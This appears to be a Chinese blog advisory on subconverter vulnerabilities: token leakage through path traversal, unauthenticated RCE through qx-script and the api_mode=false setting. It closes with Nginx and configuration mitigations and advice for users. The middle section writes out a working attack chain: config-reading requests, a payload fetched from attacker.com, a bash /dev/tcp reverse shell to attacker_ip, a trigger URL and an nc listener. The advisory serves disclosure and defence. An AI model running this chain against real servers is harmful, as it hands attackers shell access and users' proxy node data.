Subconverter 高危漏洞:你的订阅转换服务器可能已被入侵

大部分公共订阅转换服务存在 RCE 漏洞——攻击者可以获取服务器控制权,盗走所有用户的节点信息。这不是理论风险,而是正在发生的事实。

漏洞概况

subconverter 是目前最流行的订阅转换后端项目,绝大多数在线转换服务都基于它搭建。它存在以下高危漏洞:

漏洞类型 影响版本 严重程度 状态
路径穿越泄漏 token 所有版本 🔴 高危 未修复
qx-script 未授权 RCE ≤ 0.7.1 🔴 紧急 0.7.2 已移除该接口
api_mode=false 无鉴权 RCE 所有版本 🔴 高危 官方认定为"特性"

漏洞详解

1. token 泄漏(所有版本)

通过 /convert 接口的路径穿越漏洞,可以直接读取 subconverter 的配置文件:

GET /convert?url=pref.toml
GET /convert?url=pref.ini
GET /convert?url=pref.yml

配置文件中包含了 token 值和 api_modeenable_cache 等关键设置。有了 token,后续的 RCE 攻击就畅通无阻。

这个接口目前没有修复方案,只能通过 Nginx 反代来隐藏。

2. qx-script 未授权 RCE(≤ 0.7.1)

通过以下接口可以直接读取配置:

GET /qx-script?url=cHJlZi50b21s   (pref.toml 的 base64)
GET /qx-script?url=cHJlZi55bWw   (pref.yml 的 base64)

读取到 token 和配置后,攻击者可以:

  1. 构造恶意 payload,写入缓存目录
  2. 通过 script:cache/ 协议触发执行
  3. 获得服务器的 Shell 权限

实际攻击流程(已验证):

# 写入恶意指令到缓存
/sub?target=clash&url=http://attacker.com/payload

# payload 内容(反弹 Shell)
function parse(x){
    os.exec(["sh","-c","bash -i >& /dev/tcp/attacker_ip/1880 0>&1"])
}

# 触发执行
/sub?target=clash&url=script:cache/md5,1&token=password

攻击者只需执行 nc -lvp 1880 监听,被攻击服务器就会主动连接,交出 Shell 控制权。

3. api_mode=false 的"特性"

即使升级到最新代码,如果 api_mode 设为 false(默认值),执行恶意脚本仍然不需要 token。官方对此的回应是:这不是漏洞,是特性

也就是说,对外提供服务的订阅转换必须:

  • 设置 api_mode=true
  • 使用强 token(不要用 password
  • 但即使这样,token 仍然会通过 convert 接口泄漏

真实案例

不良林的实战演示中:

  1. 对某一线机场的订阅转换服务器进行测试
  2. 通过 /convert?url=pref.toml 获取到配置中的 token
  3. 发现 token 是弱口令 password
  4. 成功获取服务器 Shell 权限
  5. 可查看所有用户的转换日志,提取节点信息

这意味着:即使你信任机场官方,攻击者也可能通过订阅转换服务器的漏洞获取你的节点。

修复方案

如果你是服务提供者

# 在 Nginx 反代中屏蔽高危接口
location /convert {
    deny all;
}
location /qx-script {
    deny all;
}

同时确保:

  • api_mode=true
  • token 使用强随机字符串(openssl rand -hex 32
  • enable_cache=false(关闭缓存可以彻底杜绝 RCE)
  • 使用 Docker 或最新源码编译版

注意: 即使隐藏了接口也要开启 api_mode 和强 token,防止盲打。

如果你是用户

最安全的方案是本地订阅转换(下篇文章详细介绍),或者使用 CF Worker 反代方案(前文已介绍)。简单说:

  • 不要长期依赖任何公共在线订阅转换服务
  • 不要认为"机场官方提供的就安全"
  • 建议花 5 分钟搭建自己的 CF Worker 代理

总结

subconverter 的漏洞不是理论模型,而是真实世界中可以被复现的攻击路径。如果你在使用任何在线订阅转换服务,你的节点信息可能已经暴露。这不是危言耸听——公共转换服务"一大半存在这种情况,或许早就被利用了"。

信任不能替代可验证的安全。 花几分钟搭建自己的转换通道,是对自己隐私最基本的尊重。

参考来源:不良林《【高危漏洞】小心你的节点被盗!》视频及文章

标签: none

暂无评论

评论已关闭

此文章的评论功能已关闭。